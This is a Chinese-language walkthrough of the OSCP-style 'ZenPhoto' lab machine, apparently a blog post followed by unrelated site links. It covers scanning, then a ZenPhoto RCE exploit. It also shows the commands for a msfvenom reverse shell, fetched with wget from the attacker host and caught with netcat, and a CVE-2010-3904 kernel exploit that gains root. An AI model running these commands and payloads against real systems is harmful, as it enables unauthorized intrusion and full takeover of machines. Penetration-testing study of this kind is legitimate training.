OSCP靶场--ZenPhoto

OSCP靶场–ZenPhoto

考点(Zenphoto <= 1.4.1.4 RCE + CVE-2010-3904提权)

1.nmap扫描

##
┌──(root㉿kali)-[~/Desktop]
└─# nmap 192.168.158.41 -sV -sC  -Pn --min-rate 2500 -p-
Starting Nmap 7.92 ( https://nmap.org ) at 2024-04-11 21:14 EDT
Warning: 192.168.158.41 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.158.41
Host is up (0.14s latency).
Not shown: 64872 closed tcp ports (reset), 659 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 5.3p1 Debian 3ubuntu7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 83:92:ab:f2:b7:6e:27:08:7b:a9:b8:72:32:8c:cc:29 (DSA)
|_  2048 65:77:fa:50:fd:4d:9e:f1:67:e5:cc:0c:c6:96:f2:3e (RSA)
23/tcp   open  telnet?
| ssl-cert: Subject: commonName=ubuntu
| Not valid before: 2011-11-08T07:15:46
|_Not valid after:  2021-11-05T07:15:46
|_ssl-date: 2024-04-12T05:17:31+00:00; +4h00m03s from scanner time.
80/tcp   open  http    Apache httpd 2.2.14 ((Ubuntu))
|_http-server-header: Apache/2.2.14 (Ubuntu)
3306/tcp open  mysql   MySQL (unauthorized)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: 4h00m02s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 206.39 seconds
                                                                 

2.user priv

## 目录扫描:
┌──(root㉿kali)-[~/Desktop]
└─# dirsearch --url http://192.168.158.41/       
[21:32:25] 200 -   75B  - /index.html                                         
[21:32:25] 200 -   75B  - /index                                              
[21:33:30] 301 -  315B  - /test  ->  http://192.168.158.41/test/              
[21:33:30] 200 -    5KB - /test/                                              
                                                                              
Task Completed

###########################
##
┌──(root㉿kali)-[~/Desktop]
└─# searchsploit zenphoto         
---------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                    |  Path
---------------------------------------------------------------------------------- ---------------------------------
ZenPhoto 1.4.1.4 - 'ajax_create_folder.php' Remote Code Execution                 | php/webapps/18083.php
ZenPhoto 1.4.10 - Local File Inclusion                                            | php/webapps/38841.txt
ZenPhoto 1.4.11 - Remote File Inclusion                                           | php/webapps/39571.txt
ZenPhoto 1.4.3.3 - Multiple Vulnerabilities                                       | php/webapps/22524.txt
ZenPhoto 1.4.8 - Multiple Vulnerabilities                                         | php/webapps/37602.txt
ZenPhoto CMS 1.3 - Multiple Cross-Site Request Forgery Vulnerabilities            | php/webapps/14359.html
ZenPhoto Gallery 1.2.5 - Admin Password Reset (Cross-Site Request Forgery)        | php/webapps/9166.txt
---------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
---------------------------------------------------------------------------------- ---------------------------------
 Paper Title                                                                      |  Path
---------------------------------------------------------------------------------- ---------------------------------
MOAUB #26 - Zenphoto - Config Update / Command Execution                          | docs/english/15115-moaub-26---ze
---------------------------------------------------------------------------------- ---------------------------------
                                                                                                                    
┌──(root㉿kali)-[~/Desktop]
└─# searchsploit -m php/webapps/18083.php
  Exploit: ZenPhoto 1.4.1.4 - 'ajax_create_folder.php' Remote Code Execution
      URL: https://www.exploit-db.com/exploits/18083
     Path: /usr/share/exploitdb/exploits/php/webapps/18083.php
    Codes: OSVDB-76928, CVE-2011-4825
 Verified: True
File Type: PHP script, ASCII text
Copied to: /root/Desktop/18083.php

###############
## 反弹shell:
┌──(root㉿kali)-[~/Desktop]
└─# msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.45.195 LPORT=80 -f elf -o shell80.elf


#####
┌──(root㉿kali)-[~/Desktop]
└─# python -m http.server 80                                                                                             
192.168.158.41 - - [11/Apr/2024 22:45:53] "GET /shell80.elf HTTP/1.0" 200 -


#################
##
┌──(root㉿kali)-[~/Desktop]
└─# php 18083.php 192.168.158.41 /test/

+-----------------------------------------------------------+
| Zenphoto <= 1.4.1.4 Remote Code Execution Exploit by EgiX |
+-----------------------------------------------------------+

zenphoto-shell# wget http://192.168.45.195/shell80.elf -O /tmp/shell80.elf

zenphoto-shell# chmod +x /tmp/shell80.elf

zenphoto-shell# /tmp/shell80.elf

####################
##
                                                                                                                                                                                              
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 80
listening on [any] 80 ...
192.168.158.41: inverse host lookup failed: Unknown host
connect to [192.168.45.195] from (UNKNOWN) [192.168.158.41] 58824
which python
/usr/bin/python
which python3
whoami
www-data
python -c 'import pty;pty.spawn("bash")'
<p-extensions/tiny_mce/plugins/ajaxfilemanager/inc$ ^Z
zsh: suspended  nc -lvvp 80
                                                                                                                                                                                              
┌──(root㉿kali)-[~/Desktop]
└─# stty raw -echo ; fg
[1]  + continued  nc -lvvp 80
                             reset
reset: unknown terminal type unknown
Terminal type? screen  
<p-extensions/tiny_mce/plugins/ajaxfilemanager/inc$ whoami
www-data
<p-extensions/tiny_mce/plugins/ajaxfilemanager/inc$ 
<p-extensions/tiny_mce/plugins/ajaxfilemanager/inc$ cd /tmp
local.txt
www-data@offsecsrv:/home$ cat local.txt 
ce3882c4821fc58fa462e2c5138dba9e


########################
##






在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

3. root priv

3.1 CVE-2021-4034&CVE-2016-5195脏牛提权失败

##
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester                                                                                                                                            
[+] [CVE-2016-5195] dirtycow 2                                                                                                                                                                

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,[ ubuntu=10.04{kernel:2.6.32-21-generic} ],ubuntu=16.04{kernel:4.4.0-21-generic}
   Download URL: https://www.exploit-db.com/download/40839
   ext-url: https://www.exploit-db.com/download/40847
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2010-3904] rds

   Details: http://www.securityfocus.com/archive/1/514379
   Exposure: highly probable
   Tags: debian=6.0{kernel:2.6.(31|32|34|35)-(1|trunk)-amd64},ubuntu=10.10|9.10,fedora=13{kernel:2.6.33.3-85.fc13.i686.PAE},[ ubuntu=10.04{kernel:2.6.32-(21|24)-generic} ]
   Download URL: http://web.archive.org/web/20101020044048/http://www.vsecurity.com/download/tools/linux-rds-exploit.c

[+] [CVE-2016-5195] dirtycow

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: probable
   Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04
   Download URL: https://www.exploit-db.com/download/40611
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2021-4034] PwnKit

   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: probable
   Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main


###################
##
┌──(root㉿kali)-[~/Desktop]
└─# searchsploit dirty 
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                                              |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (1)                                                                                      | linux/dos/43199.c
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (2)                                                                                      | linux/dos/44305.c
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID Method)                                          | linux/local/40616.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method)                                             | linux/local/40847.cpp
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (Write Access Method)                                                                | linux/local/40838.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)                                          | linux/local/40839.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Access Method)                                                                 | linux/local/40611.c
Linux Kernel 5.8 < 5.16.11 - Local Privilege Escalation (DirtyPipe)                                                                                         | linux/local/50808.c
Qualcomm Android - Kernel Use-After-Free via Incorrect set_page_dirty() in KGSL                                                                             | android/dos/46941.txt
Quick and Dirty Blog (qdblog) 0.4 - 'categories.php' Local File Inclusion                                                                                   | php/webapps/4603.txt
Quick and Dirty Blog (qdblog) 0.4 - SQL Injection / Local File Inclusion                                                                                    | php/webapps/3729.txt
snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (1)                                                                                         | linux/local/46361.py
snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (2)                                                                                         | linux/local/46362.py
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Paper Title                                                                                                                                                |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
DirtyTooth: Extracting VCARD data from Bluetooth iOS profiles                                                                                               | docs/english/42430-dirtytooth-ex
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
                                                                                                                                                                                              
┌──(root㉿kali)-[~/Desktop]
└─# searchsploit -m linux/local/40839.c  

  Exploit: Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)
      URL: https://www.exploit-db.com/exploits/40839
     Path: /usr/share/exploitdb/exploits/linux/local/40839.c
    Codes: CVE-2016-5195
 Verified: True
File Type: C source, ASCII text
Copied to: /root/Desktop/40839.c




在这里插入图片描述

3.1 CVE-2010-3904[Linux提权成功]

## 参考:
https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/linux/zenphoto
https://infosecjm.medium.com/proving-grounds-zenphoto-676016681184
## poc
https://www.exploit-db.com/exploits/15285
##

## 在目标机器编译提权失败,所以在kali编译上传目标机器执行
## 操作:kali编译:先安装安装跨架构的C头文件
┌──(root㉿kali)-[~/Desktop]
└─# sudo apt-get install gcc-multilib -y

##########
## 使用-static静态编译,避免版本依赖问题 -m32:目标是32bit系统
┌──(root㉿kali)-[~/Desktop]
└─# gcc 15285.c -o 15285 -m32 -static   
15285.c: In function ‘prep_sock’:
15285.c:66:32: warning: implicit declaration of function ‘inet_addr’ [-Wimplicit-function-declaration]
   66 |         addr.sin_addr.s_addr = inet_addr("127.0.0.1");
      |                                ^~~~~~~~~
15285.c: In function ‘write_to_mem’:
15285.c:136:17: warning: implicit declaration of function ‘wait’ [-Wimplicit-function-declaration]
  136 |                 wait(NULL);

###############################
www-data@offsecsrv:/tmp/1$ wget http://192.168.45.195/15285
--2024-04-12 04:06:22--  http://192.168.45.195/15285
Connecting to 192.168.45.195:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 854100 (834K) [application/octet-stream]
Saving to: `15285'

100%[======================================>] 854,100      447K/s   in 1.9s    

2024-04-12 04:06:30 (447 KB/s) - `15285' saved [854100/854100]

www-data@offsecsrv:/tmp/1$ ls
15285
www-data@offsecsrv:/tmp/1$ chmod +x 15285
www-data@offsecsrv:/tmp/1$ ./15285   
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xc08c8c2c
 [+] Resolved default_security_ops to 0xc0773300
 [+] Resolved cap_ptrace_traceme to 0xc02f3dc0
 [+] Resolved commit_creds to 0xc016dcc0
 [+] Resolved prepare_kernel_cred to 0xc016e000
[*] Overwriting security ops...
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xc08c8c2c
 [+] Resolved default_security_ops to 0xc0773300
 [+] Resolved cap_ptrace_traceme to 0xc02f3dc0
 [+] Resolved commit_creds to 0xc016dcc0
 [+] Resolved prepare_kernel_cred to 0xc016e000
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xc08c8c2c
 [+] Resolved default_security_ops to 0xc0773300
 [+] Resolved cap_ptrace_traceme to 0xc02f3dc0
 [+] Resolved commit_creds to 0xc016dcc0
 [+] Resolved prepare_kernel_cred to 0xc016e000
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
# whoami
root
# 





在这里插入图片描述

在这里插入图片描述

4.总结:

## CVE-2010-3904提权:
https://infosecjm.medium.com/proving-grounds-zenphoto-676016681184

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/537341.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

2024 年 3 月编程语言排行榜,Python 与其他语言之间的差距从未如此之大!

TIOBE 2024 年 3 月份的编程语言排行榜已经公布&#xff0c;官方的标题是&#xff1a;Python 与其他语言之间的差距从未如此之大&#xff08;The gap between Python and the rest has never been that large&#xff09; TIOBE 指数在二月份呈现出了相对平静的态势&#xff0…

QtCreator修改项目构建目录

文章目录 QtCreator修改项目构建目录问题描述方法一方法二 QtCreator修改项目构建目录 使用QtCreator编译Qt项目时&#xff0c;如有需求修改编译过程文件&#xff08;即Makefile、.o、.exe等文件&#xff09;存放目录&#xff0c;简单在工具–>选项–>构建和运行中修改D…

NCBI 数据下载

网上介绍的那几种直接下载NCBI数据的方法大都下载速度很慢&#xff0c;但是EBI (European Bioinformatics Institute) 下载很快&#xff0c;而且它的数据库和NCBI是共享的&#xff0c;所以我们可以直接从 EBI 下载。 1 、 确定要下载的 SRA 编号&#xff1b; 2 、 EBI (https…

每日一题---OJ题: 返回倒数第 k 个节点

片头 嗨! 小伙伴们,大家好! 今天我们来一起学习这道OJ题---返回倒数第k个结点,准备好了吗? 我们开始咯! 比如: 总共有5个结点,分别为 1->2->3->4->5 , 找倒数第一个结点,也就是"5" 题目很容易理解,我们先提供第一种思路 思路一: 假设链表长度为 n ,…

Execute-Assembly(3)

绕过检测 绕过前面检测的最简单的思路就是Patch ETW。而我想的是使用BOF进行Bypass ETW 以及Assembly加载。值得庆幸得是CobaltStrike官方以及有大佬已经做了这一部分的研究。 脚本学习 在官方的文档Beacon Object Files中&#xff0c;详细描写了怎么使用CNA和BOF。根据文档提供…

【opencv】示例-detect_blob.cpp

// 导入所需的OpenCV头文件 #include <opencv2/core.hpp> #include <opencv2/imgproc.hpp> #include <opencv2/highgui.hpp> #include <opencv2/features2d.hpp> // 导入向量和映射容器 #include <vector> #include <map> // 导入输入输出…

阿里云租用服务器GPU配置报价单_1年_一个月_1小时价格表

阿里云GPU服务器租用价格表包括包年包月价格、一个小时收费以及学生GPU服务器租用费用&#xff0c;阿里云GPU计算卡包括NVIDIA V100计算卡、T4计算卡、A10计算卡和A100计算卡&#xff0c;GPU云服务器gn6i可享受3折优惠&#xff0c;阿里云服务器网aliyunfuwuqi.com分享阿里云GPU…

智能制造六大核心发展方向,驱动企业数字化转型

在制造过程中&#xff0c;智能制造展现出非凡的活力&#xff0c;它使人与智能机器的协同工作成为可能。这不仅将制造自动化的概念提升至一个新的层次&#xff0c;更将其扩展至柔性化、智能化和高度集成化的领域。通过这样的革新&#xff0c;我们得以实现数字化智能工厂的落地生…

Vue的学习之旅-part5

Vue的学习之旅-part5 虚拟DOM的原理用JS模拟DOM结构 vue的方法、计算属性、过滤器computed:{} 计算属性computed计算属性的完全体computed计算属性和methods方法的区别&#xff1a;过滤器&#xff1a;filters:{ 多个方法 } Vuex 状态管理模式 前几篇博客: Vue的学习之旅-part1 …

城市道路井盖破损丢失目标检测数据集VOC-1377张

数据集格式&#xff1a;Pascal VOC格式(不包含分割路径的txt文件和yolo格式的txt文件&#xff0c;仅仅包含jpg图片和对应的xml) 图片数量(jpg文件个数)&#xff1a;1377 标注数量(xml文件个数)&#xff1a;1377 标注类别数&#xff1a;4 标注类别名称:["jg","jg…

ARM64架构栈帧回溯

文章目录 前言一、栈帧简介二、demo演示 前言 请参考&#xff1a;ARM64架构栈帧以及帧指针FP 一、栈帧简介 假设下列函数调用&#xff1a; funb() {func() }funa() {funb() }main() {funa() }main函数&#xff0c;funa函数&#xff0c;funb函数都不是叶子函数&#xff0c;其…

AWS服务器有哪些优势?

作为一家总部在美国的公司&#xff0c;AWS为什么会受到中国企业的喜爱&#xff1f;他有什么优势&#xff1f;九河云作为AWS合作伙伴&#xff0c;将会带读者展现使用AWS的优势。 首先是作为跨国企业&#xff0c;AWS在全球有数十个区域节点&#xff0c;这种广泛的地域覆盖不仅有…

IDEA2023连接服务器docker并部署ruoyi-cloud-plus项目

文章目录 TCP 方式连接docker1. 服务器docker配置修改查看虚拟机中Docker配置文件位置修改配置文件重启docker服务关闭防火墙 2. idea安装docker插件3. idea连接docker服务 部署ruoyi-cloud-plus项目1. 项目环境说明2. 安装Centos73. 安装docker4. idea配置服务器SSH连接5. ide…

局域网内部使用的视频会议系统推荐

随着远程办公的普及和全球化的发展趋势&#xff0c;企业需要一个高效、灵活、安全的音视频会议解决方案&#xff0c;以支持远程办公的协同工作、跨地域沟通等需要。私有化音视频会议就是一个适合企业自身部署的解决方案。它不仅能够满足企业信息管理和保密的需求&#xff0c;而…

Latent Diffusion Models

Latent Diffusion Models(潜在扩散模型,LDMs)是一种生成模型,它结合了扩散模型和变分自动编码器(VAES)的优势,从文本或其他输入模式生成高质量图像。近年来,这些模型受到了相当大的关注,因为它们能够在保持对发电过程的控制的同时产生高度现实和多样化的产出。 Laten…

【灵境矩阵】零代码创建AI智能体之行业词句助手

欢迎来到《小5讲堂》 这是《灵境矩阵》系列文章&#xff0c;每篇文章将以博主理解的角度展开讲解。 温馨提示&#xff1a;博主能力有限&#xff0c;理解水平有限&#xff0c;若有不对之处望指正&#xff01; 目录 创建智能体选择创建方式零代码 基础配置头像名称简介指令开场白…

从零开始写 Docker(十)---实现 mydocker logs 查看容器日志

本文为从零开始写 Docker 系列第十篇&#xff0c;实现类似 docker logs 的功能&#xff0c;使得我们能够查查看容器日志。 完整代码见&#xff1a;https://github.com/lixd/mydocker 欢迎 Star 推荐阅读以下文章对 docker 基本实现有一个大致认识&#xff1a; 核心原理&#x…

git push报错remote: Please remove the file from history and try again

原因&#xff1a;上传文件超过100M&#xff0c;找到此文件删除即可。 1、查看是哪个文件过大&#xff0c;此处对用红框里面的 a6de1336c67c3bac77757c5eff8c8001823f7c92&#xff0c;得到具体的文件名称 git rev-list --objects --all | grep a6de1336c67c3bac77757c5eff8c80…

Pytest自动化测试框架完美结合Allure

简介 Allure Framework是一种灵活的、轻量级、多语言测试报告工具。 不仅可以以简洁的网络报告形式非常简洁地显示已测试的内容&#xff0c; 而且还允许参与开发过程的每个人从日常执行中提取最大程度的有用信息和测试。 从开发/测试的角度来看&#xff1a; Allure报告可以…

静音检测电路芯片D3703F——工 作 电 压 范 围 宽 : 3.2V ~ 16.0V,可以用于汽 车 音 响 系 统

概 述 &#xff1a; D3703F 是 一 块 汽 车 音 响 静 音 检 测 电 路 。 用 于 音 响 系 统 检 测 在 放 音 或 快 进 / 退 时 进 行 静 音 检 测 。 D3703F 的 的 电 压 范 围 &#xff1a; 3.2V &#xff5e; 16V &#xff0c; 信 号 检 测 和 静 音 时 间 可 通 过 外 围…